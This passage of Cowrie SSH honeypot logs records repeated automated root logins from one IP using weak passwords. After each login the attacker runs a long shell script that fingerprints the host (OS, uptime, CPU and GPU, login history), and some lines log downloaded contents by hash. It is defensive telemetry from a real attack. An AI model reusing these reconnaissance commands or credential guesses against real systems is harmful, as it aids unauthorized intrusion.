-gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.035350Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.037566Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.039282Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.040736Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.041849Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.043503Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.044554Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.045051Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.045723Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.046335Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.047140Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.048013Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.336539Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.338204Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:02:26.339946Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":48370,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6efd8c1cd47","protocol":"ssh","message":"New connection: 196.251.86.249:48370 (1.2.3.4:22) [session: e6efd8c1cd47]","sensor":"my-vps","timestamp":"2025-08-26T09:03:28.784586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:03:29.550418Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:03:29.551401Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.login.success","username":"root","password":"root321","message":"login attempt [root/root321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:03:32.459843Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:03:34.084442Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.085112Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.085946Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.086946Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.088274Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.088900Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.089748Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.090951Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.091507Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.091993Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.092524Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.093160Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.093809Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.671057Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.672044Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:03:34.673180Z","src_ip":"196.251.86.249","session":"e6efd8c1cd47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:03:45.864289Z","src_ip":"79.124.8.120","session":"be38e8e27a86"}
{"eventid":"cowrie.session.closed","duration":180.12683367729187,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:03:45.869240Z","src_ip":"79.124.8.120","session":"be38e8e27a86"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":54278,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8f5f4c41788","protocol":"ssh","message":"New connection: 196.251.86.249:54278 (1.2.3.4:22) [session: e8f5f4c41788]","sensor":"my-vps","timestamp":"2025-08-26T09:04:35.067538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:04:35.774784Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:04:35.775644Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:04:37.855330Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:04:40.099194Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.100293Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.100782Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.101828Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.102886Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.103890Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.105060Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.105981Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.106559Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.107163Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.107788Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.108760Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.109169Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.638927Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.639768Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:04:40.641062Z","src_ip":"196.251.86.249","session":"e8f5f4c41788"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":58900,"dst_ip":"1.2.3.4","dst_port":22,"session":"73f0c0e52fce","protocol":"ssh","message":"New connection: 196.251.86.249:58900 (1.2.3.4:22) [session: 73f0c0e52fce]","sensor":"my-vps","timestamp":"2025-08-26T09:05:38.738864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:05:39.228037Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
